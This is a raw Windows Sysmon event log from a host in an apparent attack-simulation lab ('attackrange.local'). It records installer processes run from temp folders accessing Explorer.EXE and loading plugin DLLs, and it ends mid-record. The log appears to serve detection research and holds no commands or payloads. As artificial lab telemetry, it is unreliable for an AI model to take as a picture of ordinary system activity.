13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.068{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.068{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.068{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.068{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\windows.storage.dll+1e3eaa(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.068{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.068{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.068{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000014072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.052{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\CityHash.dll2021-01-18 13:59:52.052 11241100x800000000000000014071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.005{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\UAC.dll2021-01-18 13:59:52.005 11241100x800000000000000014070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.005{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll2021-01-18 13:59:52.005 10341000x800000000000000016520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.